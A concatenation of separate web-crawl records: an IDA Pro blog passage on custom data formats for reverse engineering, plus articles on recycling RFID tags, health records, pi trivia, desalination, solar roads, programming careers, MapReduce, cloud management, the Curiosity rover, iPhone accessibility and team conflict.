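print(make_dword_format(0xDEADBEEF))  # -> MAKE_DWORD(0xDEAD, 0xBEEF)
```

In IDA, the same logic would live inside the registered format's printing callback, which receives the raw bytes and returns the text to display.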
Next we illustrate some possible uses of custom types and formats; other uses are possible as well, limited only by your imagination.
Decoding embedded bytecodes
Imagine you are debugging an x86 program that implements its own VM and embeds bytecode programs for it in the binary.
The classical solution for this problem can be:
- Write a dedicated processor module and then load the extracted bytecodes separately
- Or define the bytecodes as bytes and then use comments to describe the real meaning of those bytecodes.
With this new addition, one can just write a custom data type to handle the situation:
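The printing callback of such a type is essentially a miniature disassembler. As a hedged sketch, assume a hypothetical VM whose instructions are two bytes each (one opcode byte, one operand byte); the opcode table below is invented for illustration and is not the actual simplevm encoding:

```python
# Invented opcode table for a hypothetical two-byte-per-instruction VM.
OPCODES = {0x01: "push", 0x02: "pop", 0x03: "add", 0x04: "jmp"}

def disasm(code):
    """Decode an embedded bytecode blob into assembly-like text lines,
    falling back to a raw 'db' line for any unknown opcode."""
    lines = []
    for off in range(0, len(code) - len(code) % 2, 2):
        op, arg = code[off], code[off + 1]
        mnem = OPCODES.get(op, f"db 0x{op:02X}")
        lines.append(f"{off:04X}: {mnem} {arg}")
    return lines

print(disasm(bytes([0x01, 7, 0x01, 5, 0x03, 0])))
# -> ['0000: push 7', '0002: push 5', '0004: add 0']
```

A custom data type would wrap this decoder: its size callback reports how many bytes one instruction occupies, and its format callback returns the decoded text for rendering in the listing.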
And if you happen to have a situation where the bytecodes are operands to instructions (as means of obfuscation), you can still apply the custom format on those operands:
The previous blog entry showed how to write processor modules using Python. What if one simply uses the “import” statement to import a full-blown processor module script and use it in the custom data types/formats? 😉
Displaying resource strings
When reversing MS Windows applications, one often encounters string IDs; how can you easily and nicely fetch the corresponding string and display it in the disassembly listing?
Normally, one would have to use a resource editor to extract the string value corresponding to the string id, then to create an enum in IDA for each string ID with a repeatable comment:
That works, but what about writing your own custom format instead:
And then applying it directly, without having to use a resource editor to extract the string value; the custom format does that programmatically for you:
This is how a resource string custom format handler might look:
To take a closer look at it, you can download the custom data type handler script along with the source code of the simplevm assembler/disassembler and the C program that was used in this article. | <urn:uuid:a9c54aa2-2273-41c3-974a-67ec4423e73e> | CC-MAIN-2017-04 | http://www.hexblog.com/?p=117 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00100-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.844356 | 689 | 3.03125 | 3 |
Public works officials in Laurel, Md., don't like wasting money -- especially not on dumping trash that could have been recycled.
That's why the city made recycling a requirement for city residents living in single-family homes and townhouses, and encourages it at apartment complexes. That's also why its public works department recently installed radio frequency identification (RFID) tags on recycle bins to track recycling habits.
Laurel's high-tech approach is part of a pilot program in the city's Greens of Patuxent neighborhood, in which recycling crews use handheld scanners to read the tags attached to the bins and record their data. With software and technology developed by Rehrig Pacific Co., each ID tag has been linked to an address, so the city can keep track of residents who recycle and those who don't.
Typically noncompliance leads to a courtesy notice, which can then lead to citations of $25 to $100. But the city wants to avoid fines. None will be issued during the program, which the city hopes will help educate rather than penalize the public, said Michele Blair, the city's recycling coordinator.
The idea of scanning recycle bins has roots elsewhere in a program called RecycleBank, which tracks how many pounds a household recycles and offers incentives, such as coupons and discounts. Co-founded in 2005 by Ron Gonen, the program runs in more than 75 cities and in the UK.
Patient Safety and Electronic Health Records (EHRs)
EHRs Support Safer, Higher Quality Health Care
As early as 2001, the Institute of Medicine stated that to support safer, higher quality health care, systems of care needed to be redesigned including the use of information technology to support clinical and administrative processes.
Adverse events, or injuries caused by medical management, are the result of errors of commission (errors in dose, surgical error, etc.) and omission (avoidable delay in diagnosis, failure to act on test results, etc.). Patient data safety systems should incorporate immediate access to patient information and decision support tools while also capturing adverse events and near misses to enable the design of safer care delivery systems.
The current healthcare information infrastructure is error prone and studies demonstrate that electronic health record (EHR) users make more appropriate clinical decisions.
This slide presentation includes key capabilities of an EHR system and recommendations of the Institute of Medicine Committee on Data Standards for Patient Safety.
- Presentation on Patient Safety: Achieving A New Standard for Care (Institute of Medicine Committee on Data Standards for Patient Safety November, 2003)
- The JCAHO Patient Safety Event - Taxonomy: A Standardized Terminology and Classification Schema for Near Misses and Adverse Events | <urn:uuid:25719201-ad32-4fe0-b7ff-836c7085a7dd> | CC-MAIN-2017-04 | https://www.givainc.com/healthcare/patient-safety-ehr-adverse-events.cfm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00119-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.880123 | 302 | 2.625 | 3 |
That's right, March 14 is international Pi Day. Get it -- pi is 3.14, and March 14 is 3/14?
Most everyone knows pi -- the ratio of the circumference of a circle to its diameter. But how much do you really know about this magical number? Below are 28 fun facts about pi split up into tidy categories. Enjoy!
Pi in society
-Pi Day is also Albert Einstein's birthday, along with the birthdays of Apollo 8 Commander Frank Borman, Astronomer Giovanni Schiaparelli, and last-man-on-the-moon Gene Cernan.
-There is a pi cologne.*
-Computing pi is a stress test for a computer -- a kind of "digital cardiogram."*
-The record for calculating pi, as of 2010, is to 5 trillion digits (source: Gizmodo).
Random pi information
- If you were to print 1 billion decimal values of pi in ordinary font it would stretch from New York City to Kansas (source: Buzzle).
- 3.14 backwards looks like PIE.
- "I prefer pi" is a palindrome.
-If you divide the circumference of the sun by its diameter, what will you have? Pi in the sky! (source: Jokes4us.com)
- What do you get if you divide the circumference of a jack-o'-lantern by its diameter? Pumpkin pi! (source: Jokes4us.com)
Pi in movies and TV
-There's a reference to Pi in "Star Trek."*
-Many movies have been made about pi, including "Pi: Faith in Chaos," which is about a man who goes mad trying to rationalize pi.*
-Other movie references to pi include pi being the secret code in Alfred Hitchcock's "Torn Curtain" and "The Net" with Sandra Bullock.*
-In the book "Contact" by Carl Sagan, humans study pi to gain awareness about the universe.*
-The first million decimal places of pi consist of 99,959 zeros, 99,758 ones, 100,026 twos, 100,229 threes, 100,230 fours, 100,359 fives, 99,548 sixes, 99,800 sevens, 99,985 eights and 100,106 nines.*
-There are no occurrences of the sequence 123456 in the first million digits of pi -- but of the eight 12345s that do occur, three are followed by another 5. The sequence 012345 occurs twice and, in both cases, it is followed by another 5.*
-The first six digits of pi (314159) appear in order at least six times among the first 10 million decimal places of pi.*
-At position 763 there are six nines in a row, which is known as the Feynman Point.^
Pi the number
-The fraction 22/7 is a well-used number for Pi. It is accurate to 0.04025%.^
-Another fraction used as an approximation to Pi is (355/113), which is accurate to 0.00000849%.^
-A more accurate fraction of Pi is (104348/33215). This is accurate to 0.00000001056%.^
-The square root of 9.869604401 is approximately Pi.^
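The quoted accuracy figures for the three fractions are easy to check with a few lines of Python (math.pi is itself a double-precision approximation, but its own error is several orders of magnitude below even the best fraction here):

```python
import math

# Relative error, in percent, of each pi approximation cited above.
for num, den in [(22, 7), (355, 113), (104348, 33215)]:
    err_pct = abs(num / den - math.pi) / math.pi * 100
    print(f"{num}/{den} is accurate to about {err_pct:.4g}%")
```

Running this reproduces the 0.04025%, 0.00000849% and 0.00000001056% figures quoted in the list.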
The symbol pi
-In the Greek alphabet, pi (π) is the 16th letter. In the English alphabet, p is also the 16th letter.*
There are pi haters
-Check out this slideshow of ways to celebrate Tau Day, an alternative calculation to Pi Day.
-Around 2000 B.C., Babylonians established the constant circle ratio as 3 1/8 or 3.125. The ancient Egyptians arrived at a slightly different value of 3 1/7 or 3.143.*
-One of the earliest known records of pi was written by an Egyptian scribe named Ahmes (c. 1650 B.C.) on what is now known as the Rhind Papyrus. He was off by less than 1% of the modern approximation of pi (3.141592).*
-Plato (427-348 B.C.) supposedly obtained for his day a fairly accurate value for pi:
This story, "28 Facts About Pi That You Probably Didn't Know" was originally published by Network World. | <urn:uuid:0bf9b431-64b8-48f9-b596-e7747056a9e5> | CC-MAIN-2017-04 | http://www.cio.com/article/2387553/hardware/28-facts-about-pi-that-you-probably-didn-t-know.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00027-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92399 | 950 | 2.984375 | 3 |
In 2003, the total quantity of desalinated water used was 102.4 million cubic meters, against 44.1 million cubic meters in 1991. In 2005, treated wastewater (secondary treatment) amounted to about 62 million cubic meters per year, against 45 million cubic meters in 1991. Despite this increase, only 16.3 million cubic meters per year received tertiary treatment, part of which was used for irrigation in government farms and some private farms; the rest was discharged into the sea. The tertiary-treated water has chemical and hygienic properties within international limits and is considered suitable for agricultural purposes. The government has plans to fully utilize Treated Sewage Effluent (TSE) water through major agricultural projects; however, constant delays and a lack of funds have greatly restricted its usage. As of 2015, the desalination market in Bahrain was worth USD X.X billion. The market size is expected to grow at a CAGR of XX.XX%.
Depleting natural precipitation and groundwater levels, together with an increasing population, are the major drivers of the sector in the region. Continued efforts to diversify government income away from hydrocarbons have also led to an increase in construction projects, industries, manufacturing plants, etc., creating more demand for fresh water. Moreover, the government is supporting and encouraging the establishment of desalination plants to meet the nation’s demands.
Restraints and Challenges
The biggest challenge of desalination is cost. According to one study, the cost of desalinated water per cubic meter was USD 1.04, 0.95 and 0.82 for MSF, MED and RO respectively, assuming a fuel cost of USD 1.5/GJ. Energy accounts for approximately three-fourths of the supply cost of desalination, and transportation adds to the overall cost, making desalination a very costly process. Desalination also has a negative environmental impact: treating brackish water can pollute freshwater resources and soil, and discharging salt onto coastal or marine ecosystems harms them as well.
Bahrain’s government intends to make desalination the source of 100% public potable water supply. The government has upgraded the four existing plants and their capacities. Moreover, it is inviting more and more foreign investments in the region to keep up with the domestic needs that are continuously on the rise due to an increase in the number of construction projects, manufacturing industries, etc.
About the Market | <urn:uuid:75182b69-b212-4a27-b99f-efe0f5f9a234> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/desalination-industries-in-bahrain-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00331-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955808 | 539 | 2.9375 | 3 |
Imagine driving on a road paved not with asphalt but with glass. And within this glass are photovoltaic cells that transform sunlight into electricity and send it directly to the homes lining the street. That’s the aim of an Idaho-based company called Solar Roadways. And before you dismiss the notion as impossible, you might be astonished to know that the company has federal funding and is currently leading the GE Ecomagination Powering Your Home Challenge, a program that promotes energy innovation.
“There’s 25,000 square miles of road surfaces, parking lots and driveways in the lower 48 states. If we covered that with solar panels with just 15 percent efficiency, we’d produce three times more electricity than this country uses on an annual basis, and it’s almost enough to power the entire world,” said Scott Brusaw, co-founder of Solar Roadways, in a segment of Your Environmental Road Trip, a new film that explores cutting-edge energy solutions.
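Brusaw's arithmetic is easy to sanity-check. The sketch below uses an assumed average US insolation of about 4.5 kWh per square meter per day (my assumption, not a figure from the article) together with the area and 15 percent efficiency he cites:

```python
# Back-of-envelope check of the Solar Roadways claim. The insolation
# figure is an assumption; only the area and efficiency come from the quote.
SQ_METERS_PER_SQ_MILE = 2.59e6
area_m2 = 25_000 * SQ_METERS_PER_SQ_MILE       # paved area in the lower 48
insolation_kwh_m2_day = 4.5                    # assumed average US insolation
efficiency = 0.15                              # quoted panel efficiency

annual_twh = area_m2 * insolation_kwh_m2_day * efficiency * 365 / 1e9
print(f"~{annual_twh:,.0f} TWh per year")
```

With US electricity consumption on the order of 4,000 TWh per year, the result lands in the same "several times annual usage" range Brusaw describes, so the claim is at least the right order of magnitude.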
Though many think driving on glass wouldn’t work, materials scientists beg to differ. Window glass is only one of countless forms glass can take. If specially manufactured, its strength can be that of steel and ideal for driving on.
“In dry conditions … there would be few surfaces better for a roadway than glass,” wrote the Pacific Northwest National Laboratory’s Joseph Ryan, a specialist in materials science, in a paper titled Energy Solutions from Glass Road Surfaces. This changes when water is introduced; however, that problem could be mitigated. “Molten glass can easily be molded into shapes specifically designed to maximize the run-off of water and maximize tire-roadway contact in wet conditions,” he said.
Solar Roadways has built a 12-foot-by-12-foot prototype. Not only does the panel generate energy, it also lights up, creating a safer nighttime driving experience.
It’s innovative solutions like Solar Roadways that many hope will serve as the foundation of our energy future. There won’t be a handful of energy sources — coal, oil, nuclear — like we have today. Rather, an entire ecosystem of energy technologies will work together to power our world.
As admirable as it is, it’s likely that Brusaw’s vision of the entire road grid covered in his panels won’t come to fruition. But even if some roads aren’t transformed by Solar Roadways, there are plenty of other ways to harvest energy from them.
Enter piezoelectricity. Piezoelectricity is the charge that’s generated by applying mechanical strain to materials. There are many devices we use every day that create piezoelectricity. Cigarette lighters and gas grills, for example, employ a small hammer that strikes a piezoelectric crystal — usually quartz — that creates sufficient current to spark a gas flame. Many other materials, such as cane sugar, topaz, bone, wood and certain ceramics exhibit piezoelectric properties. This fundamental electromechanical principle is being used by some companies that hope to transform our everyday movements into energy.
“There are several types of technologies in energy harvesting which converts kinetic movement into electricity,” said Farouk Balouchi, a technology analyst at IDTechEx, a research and analysis firm specializing in energy harvesting. “Kinetic energy can be transformed from movement into usable electricity for signage, low-power lighting, sensor systems and that type of thing.”
To do this, some companies are building piezoelectric energy devices that can be deployed in homes and offices. Germany-based EnOcean creates energy harvesters that generate a small amount of electricity when they sense motion, pressure, light, temperature change, rotation or vibration. For example, if these devices were installed in floors and on steps, every time people moved, electricity would be created and used to help power the facility. The electricity generated would supplant the energy that would normally come from the grid, allowing a home or office to power itself while helping to create a more efficient energy environment.
“[These] devices are being scaled down and made very small, and they allow a small movement or vibration to be used to power the electronics, which have become very small and only require microwatts of power,” Balouchi said. “It would be part of the kind of ecosystem of our living planet. The ‘Internet of Things’ comes to mind, where you have sensors in every part of your living environment, in the buildings and in the floors, in every part of your life.
“You can envision these systems powering themselves and being put into a building’s structure, so a truck driving by or a vibration on the actual wall of the building causes these devices to charge themselves,” Balouchi added.
Innowattech, based in Ra’anana, Israel, develops piezoelectric devices that are installed in roads and railways. The devices transform the kinetic energy of vehicles and trains into electricity, which is used to power lights, traffic signals, railroad crossings and red-light cameras along the road. Any excess electricity that’s generated is delivered into the grid for other uses.
In 2009, the Israeli government sponsored an experiment in which Innowattech installed its devices in a 10-yard stretch of highway. Each hour the small section of roadway generated 2,000 watt-hours of electricity. Innowattech calculated that if the devices were installed in a single lane one kilometer long, 200 kilowatt-hours of electricity could be produced — enough to power 200 to 300 homes.
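Assuming output scales linearly with the instrumented length of roadway (the simplest reading of Innowattech's claim), the scale-up is straightforward to check:

```python
# Scale the 10-yard test section's reported output up to a one-kilometer
# lane, assuming output grows linearly with length.
YARDS_PER_KM = 1000 / 0.9144          # about 1,094 yards per kilometer
section_wh_per_hour = 2000            # reported output of the 10-yard stretch

sections_per_km = YARDS_PER_KM / 10   # ~109 ten-yard sections per kilometer
km_kwh_per_hour = section_wh_per_hour * sections_per_km / 1000
print(f"~{km_kwh_per_hour:.0f} kWh per hour per kilometer of lane")
```

That works out to roughly 220 kWh per hour, consistent with the 200 kilowatt-hour figure Innowattech quotes.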
“The energy is quite significant,” Balouchi said. “You’re talking about kilowatts of power and that could actually be put back into the grid system and used productively.”
Not all the energy solutions of tomorrow exist on the open road. Many promising technologies simply make existing energy generation better. At the 2011 Consumer Electronics Show in Las Vegas, Panasonic showed off its household fuel cell cogeneration system. The home fuel cell creates a chemical reaction using oxygen in the air and hydrogen, which in this case is extracted from a home gas connection. The reaction creates electricity and heat. The electricity helps power the home, while the heat is used to heat water and the home itself.
The household fuel cell has been available in Japan since 2009. There, the system has shown it can generate up to one-third of the energy used by an average Japanese household of four.
“You are literally generating on the site of your own home, your own electricity just as if it was a windmill generator or anything else,” said Peter Fannon, who manages Panasonic’s Corporate Environmental, Government & Public Affairs and Product Safety & Regulatory Compliance groups. “The goal is to reach a zero carbon dioxide emissions household, which we hope is doable within the next eight to 10 years.”
The systems aren’t cheap — Fannon said they retail at around $30,000. But like current home solar installations, he expects a combination of incentives and government programs to cut the price in half for homeowners.
As technology matures, the home fuel cell and other technologies like piezoelectric generation will help to address a fundamental problem with the electrical grid. Long-distance electricity transmission leads to line loss — the steady loss of electricity over distance. As more technologies develop that allow home and business owners to generate electricity on site, the line-loss problem starts to go away, making for a much more efficient energy environment.
“It’s 20 to 26 percent line loss in long distance, which is really painful,” Fannon said. “It’s because the lines are old and it’s [because of] the distance.”
Whether it’s a home fuel cell, a solar-powered road or a floor panel that creates electricity when you step on it, the future of energy is shaping up to be a diverse ecosystem of solutions that many hope will one day lead to true energy independence. | <urn:uuid:60a8f86d-96ee-4b8f-94df-c0d668248501> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Energy-Ecosystem-of-the-Future.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942919 | 1,696 | 3.40625 | 3 |
The iPhone is the must-have technology of the moment—unless you are unable to use it. A user must be able:
- To see fairly well, not 20-20 vision but something close. If the user is blind they cannot see the controls on the screen and therefore cannot control the device. If the user has a vision impairment the controls may not be sufficiently clear and again the device is of no use.
- To hold the device steady with one hand whilst controlling it with the fingertips of the other. Whilst ruling out its use by a tetraplegic user, it also appears to rule out ladies with long nails (the nails get in the way of the fingertips, and trying to control the device with the pads of fingers or with nails does not seem to work well, if at all).
If you search for 'iphone accessibility' on the Apple site you will find a list of standard features that can make the iPhone more accessible. It is a useful list but leaves a significant number of holes.
It might be argued that the iPhone is a very visual device so a blind user would not want to use it. This is wrong because there are a large number of features that will appeal to blind users that are not available on other devices. These include the excellent integration with the diary and address book on the Mac, integration of the iPod function into the phone, and functions relating to GPS (a friend of mine puts a to-do on his iPhone to shop at a particular supermarket and when he is in the vicinity it automatically reminds him).
So the question becomes how could the iPhone be made more accessible without a complete redesign?
My suggested answers are based around the other input and output facilities of the iPhone: sound input, sound output, the movement sensor and the vibrator, as well as suggestions for alternative pointing devices and grips.
The iPhone uses a capacitive touchscreen which recognises the capacitance of a bare fingertip; it does not recognise a fingernail or a plastic stylus because they do not conduct electricity well. It is possible to design stylus pointer devices that do have a capacitance and would be recognised. The simplest would be a metal stylus held in the hand, but some general purpose device that works independently of bare fingers might be more useful. This device could be used with a prosthetic hand, at the end of a pointer held in the mouth, or in a variety of other similar ways. It could also prove useful to apparently able-bodied users who cannot use bare fingertips, including the lady with long nails but also workers in cold or dangerous situations who have to wear gloves. In fact there are third parties who sell such devices but they are not mentioned in the Apple documentation.
The typical way to use the iPhone is to hold it in one hand and control it with the fingers of the other. Some people do not have two hands and others need to use one hand for something else so a variety of stands, straps, clips and grips should be available. Again these are available from third parties but not marketed as accessibility aids.
The iPhone has superb sound quality which could be used for a screen reader but at present is not. Such a function would make the iPhone accessible to a large number of people with vision impairments. People who can see well enough to identify the buttons on the screen, but not well enough to read the text, would benefit from a screen reader that reads out the area being pointed at and then activates it if pressed again. The Mac operating system, OS X Leopard, has the VoiceOver technology, so Apple have the basis for developing an iPhone VoiceOver.
If the user cannot see the screen at all then VoiceOver will not be sufficient and they will need another method to control the device. Voice recognition is the most obvious possibility; again, the Mac already has Speech Command, so building it into the iPhone should not be difficult.
Another possible input that is unique to the iPhone is the motion sensor. Any motion of the device can be detected; the standard phone will pick a landscape or portrait presentation depending on how the device is being held. There are games that use this to control an on-screen car. My thought is that it could be used to move the focus—for example tilt up, down, left and right could be the equivalent of cursor keys, whilst rotate right and back would be the equivalent of enter.
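To make the tilt idea concrete, here is one way the mapping could look, sketched in Python with made-up thresholds (the function name and values are my own; a real implementation would live in the phone's native software):

```python
def tilt_to_command(pitch, roll, threshold=15.0):
    """Map device tilt in degrees to a cursor-style navigation command.

    pitch: forward/back tilt; roll: left/right tilt.
    The 15-degree threshold is an arbitrary illustrative choice.
    """
    if pitch > threshold:
        return "down"
    if pitch < -threshold:
        return "up"
    if roll > threshold:
        return "right"
    if roll < -threshold:
        return "left"
    return None  # device roughly level: focus stays put

print(tilt_to_command(20, 0))    # "down"
print(tilt_to_command(0, -30))   # "left"
```

A rotate gesture could then be detected separately and mapped to "enter", as suggested above.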
The vibrate feature can obviously be used for warnings as it is at the moment. It could also be used to give information, for example in conjunction with GPS and the motion sensor the user could rotate the device until it strongly vibrates then walk in that direction.
Whenever I look at devices or features designed to help people with disabilities my next thought is how could this also help a larger population. The obvious population in this case is car drivers where hand and eye free control is becoming a must and voice output of SMS is becoming the norm.
It would seem to me that:
- Apple should do more to provide basic accessibility for the iPhone.
- Specialists in specific disabilities should provide further functionality via the Apple App Store.
- Information about all the accessibility features from Apple and third parties should be available in one place.
If you have developed an app or add-on device that could make the iPhone more accessible, or even if you just have an idea for one, please add your comments to this article.
Earlier in my career I was a C programmer. Not a C++ programmer, a C programmer. The reason I didn’t program in C++ is because it didn’t exist yet. I thought that C, and then C++ when it entered the scene, were incredibly strong and versatile programming languages. Having previously programmed in various other languages, I thought it was interesting that I could increment a counter by putting two plus signs before or after it. For those not in the programming world, “x = x + 1” and x++ are equivalent statements.
I remember asking the person who was teaching me how to program in C why this new syntax existed. He told me four things:
1. It provides greater flexibility when forming computations because you can refer to and increment the value of “x” in the same statement.
2. If you place the “++” after the “x” it increments after its use, and if you place the “++” before the “x” it increments before its use.
3. This syntax assists the compiler in creating efficient assembly language code (compilers were not as advanced at that time).
4. It looked really cool, and people using other programming languages wouldn’t know what it meant.
I then asked him if the “x = x + 1” format would still work. He told me that yes, it would, but never use it in C programs because the other C programmers will make fun of you. Real C programmers only use the “x++” format.
When asking people why they like one programming language over another, one of the following themes, best described in memorable TV commercials and great classic songs, comes to mind:
• Less Filling, Tastes Great: This theme illustrates that sometimes more than one programming language can appropriately do the job; it just comes down to a decision between two great options. (Ok, yes, I’m thinking about Java versus .NET.)
• Love the one you’re with: This is the case that sometimes the language you know always seems to be better than the language you don’t know.
• Try it, you’ll like it: This is often the theme brought forward by technical evangelists, rightly so, trying to get you to learn a new emerging technology. Remember, there was a time when C++, Java, .NET, PHP, and even COBOL were brand new languages.
• I heard it through the grapevine: This is when a new language, or other technology, gets incredible hype within the industry and everyone starts (or wants) to hop on the bandwagon.
• My dog is better than your dog: This is the case when people get entrenched in a specific technology and feel like it is the solution to all problems. Another way to state this phenomenon is that when you have a hammer, everything looks like a nail.
My reason for telling you this story, other than the fact that I always smile when I think of it, is that it takes an incredible amount of time, effort, and commitment to truly become expert in a specific programming language. As a result, you should think carefully before selecting a language, to be sure it's the right language for your marketability, interests, and long-term career.
Consider the following questions in making the decision to learn a new programming language.
• How marketable is this language in my geographic location? For example, if you work in Boston, how many local companies hire people with knowledge of this language?
• Is this language used within the industry in which I would like to work? For example, if you want to work in the video game industry, you should learn the languages most often used in the creation of software for video games.
• To use this language effectively, what other technologies will I have to learn? For example, if you are considering learning .NET, then you may also want to learn how to use SourceSafe and SQL Server.
• How large is the job market for people knowing this language? Alternatively stated, is this language generally used in all industries and for many purposes, or is it a niche language only used for specific purposes?
• How much competition is there for jobs using this technology? That is to say, are there more people than jobs or more jobs than people? As an aside, if there are more jobs than people, the average pay of everyone knowing that language will generally go up, because the demand for this skill set is larger than the supply of people who have it.
• What is the language's future? Is it growing or shrinking in popularity? That is to say, in two years and/or five years, will there be more jobs or fewer jobs available for people who know this technology?
I chose a programming language as my example, but I could have used any technology or any IT related job. There are a lot of great technologies out there, programming languages, analytical tools, software packages, hardware devices, and software tools. As technologists, whether you are a programmer, a help desk professional, a software tester, or any other hands-on techie, carefully choose the technologies you learn and the technologies you decide not to learn. These decisions, whether through good luck or bad, deep analysis or wild guess, will help frame your professional future. Be careful and choose wisely.
If you have any questions about your career in IT, please email me at eric@ManagerMechanics.com or find me on Twitter at @EricPBloom.
Until next time, work hard, work smart, and continue to grow.
Read more of Eric Bloom's Your IT Career blog and follow the latest IT news at ITworld. Follow Eric on Twitter at @EricPBloom. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:b33569fc-6164-4422-9511-b8ec39d5a0b2> | CC-MAIN-2017-04 | http://www.itworld.com/article/2713362/careers/selecting-the-best-programming-language--a-k-a-less-filling--taste-great-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950089 | 1,209 | 2.859375 | 3 |
How Google Works: Reducing Complexity
By David F. Carr | Posted 2006-07-06
For all the razzle-dazzle surrounding Google, the company must still work through common business problems such as reporting revenue and tracking projects. But it sometimes addresses those needs in unconventional—yet highly efficient—ways.
Google's distributed storage architecture for data is combined with distributed execution of the software that parses and analyzes it.
To keep software developers from spending too much time on the arcana of distributed programming, Google invented MapReduce as a way of simplifying the process. According to a 2004 Google Labs paper, without MapReduce the company found "the issues of how to parallelize the computation, distribute the data and handle failures" tended to obscure the simplest computation "with large amounts of complex code."
Much as the GFS offers an interface for storage across multiple servers, MapReduce takes programming instructions and assigns them to be executed in parallel on many computers. It breaks calculations into two parts—a first stage, which produces a set of intermediate results, and a second, which computes a final answer. The concept comes from functional programming languages such as Lisp (Google's version is implemented in C++, with interfaces to Java and Python).
A typical first-week training assignment for a new programmer hired by Google is to write a software routine that uses MapReduce to count all occurrences of words in a set of Web documents. In that case, the "map" would involve tallying all occurrences of each word on each page—not bothering to add them at this stage, just ticking off records for each one like hash marks on a sheet of scratch paper. The programmer would then write a reduce function to do the math—in this case, taking the scratch paper data, the intermediate results, and producing a count for the number of times each word occurs on each page.
One example, from a Google developer presentation, shows how the phrase "to be or not to be" would move through this process.
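Google's MapReduce is implemented in C++ with Java and Python interfaces; the toy sketch below (plain Python, with function and variable names of my own choosing, not Google's API) shows the same two-phase shape applied to that example phrase:

```python
from collections import defaultdict
from itertools import chain

def map_phase(doc_id, text):
    """Tally each occurrence as a (word, 1) pair -- the 'hash marks on
    scratch paper' stage; no adding happens yet."""
    return [(word, 1) for word in text.split()]

def reduce_phase(pairs):
    """Group the intermediate pairs by word and do the math."""
    counts = defaultdict(int)
    for word, n in pairs:
        counts[word] += n
    return dict(counts)

docs = {"page1": "to be or not to be"}
intermediate = list(chain.from_iterable(map_phase(d, t) for d, t in docs.items()))
print(reduce_phase(intermediate))   # {'to': 2, 'be': 2, 'or': 1, 'not': 1}
```

In the real system, the intermediate pairs would be partitioned across many worker machines and sorted before the reduce step; here everything runs in one process purely to illustrate the division of labor.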
While this might seem trivial, it's the kind of calculation Google performs ad infinitum. More important, the general technique can be applied to many statistical analysis problems. In principle, it could be applied to other data mining problems that might exist within your company, such as searching for recurring categories of complaints in warranty claims against your products.
But it's particularly key for Google, which invests heavily in a statistical style of computing, not just for search but for solving other problems like automatic translation between human languages such as English and Arabic (using common patterns drawn from existing translations of words and phrases to divine the rules for producing new translations).
MapReduce includes its own middleware—server software that automatically breaks computing jobs apart and puts them back together. This is similar to the way a Java programmer relies on the Java Virtual Machine to handle memory management, in contrast with languages like C++ that make the programmer responsible for manually allocating and releasing computer memory. In the case of MapReduce, the programmer is freed from defining how a computation will be divided among the servers in a Google cluster.
Typically, programs incorporating MapReduce load large quantities of data, which are then broken up into pieces of 16 to 64 megabytes. The MapReduce run-time system creates duplicate copies of each map or reduce function, picks idle worker machines to perform them and tracks the results.
Worker machines load their assigned piece of input data, process it into a structure of key-value pairs, and notify the master when the mapped data is ready to be sorted and passed to a reduce function. In this way, the map and reduce functions alternate chewing through the data until all of it has been processed. An answer is then returned to the client application.
If something goes wrong along the way, and a worker fails to return the results of its map or reduce calculation, the master reassigns it to another computer.
As of October, Google was running about 3,000 computing jobs per day through MapReduce, representing thousands of machine-days, according to a presentation by Dean. Among other things, these batch routines analyze the latest Web pages and update Google's indexes.
The cloud is revolutionizing networking, and this overhaul presents enormous challenges for IT managers who are used to being able to see, monitor and control their networks and systems.
Network and systems management software has been heading in this general direction for years and is better positioned than you might think to take this next step - but there are several areas that require more work by the industry.
IN DEPTH: Guide to cloud management software
To understand the size of the problem, let’s take a look at what cloud computing is. There are many definitions, but at its heart, cloud computing is an abstraction of things that have not been abstracted before. Instead of having servers, software, applications and storage dedicated to certain tasks, all of that is abstracted to the user and even the IT manager.
Instead of being concerned about individual servers, the focus is on the services they provide – services like email or a sales application. Under the covers, resources (like servers, network devices, storage and operating systems) are shared for these services. Automation software can set up and tear down resources as needed – provisioning a virtual machine with an operating system and an application, for instance, and then tearing it down later. But the person using the service is unaware of the resources being used underneath, and they can be changing all the time.
This story, "Cloud computing presents new challenges for management software" was originally published by Network World. | <urn:uuid:a0adc393-c679-4f3c-80c7-f27f2992ecf5> | CC-MAIN-2017-04 | http://www.itworld.com/article/2739682/data-center/cloud-computing-presents-new-challenges-for-management-software.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957713 | 293 | 2.515625 | 3 |
A lot of attention is being paid to the NASA Curiosity rover's landing on the early morning of Sunday, Aug. 6 (at about 1:30 a.m. Eastern), especially with the "7 Minutes of Terror" landing cycle.
But should the landing be successful, then what? What is Curiosity going to be doing then? To help out, NASA has posted this video, introducing us to SAM, the Sample Analysis at Mars lab, and what it plans to do once it's on the surface of the Red Planet.
Bonus video: NASA's Jet Propulsion Laboratory also posted this video on "What's up for August" if you're looking for some other space-related activities for the month.
Keith Shaw rounds up the best in geek video in his ITworld.tv blog. Follow Keith on Twitter at @shawkeith.
Conflict is something people tend to shy away from. At its worst, conflict is all about confrontation, disagreement, winners, and losers. Indeed, when people think of conflict, images of shouting matches and stressful confrontations may come to mind. Resolving conflict is not about winning or losing, but about finding the best way to advance the team toward its goals. By avoiding the debilitating effects of negative conflict, teams stay out of a trap that can sap their effectiveness and productivity.
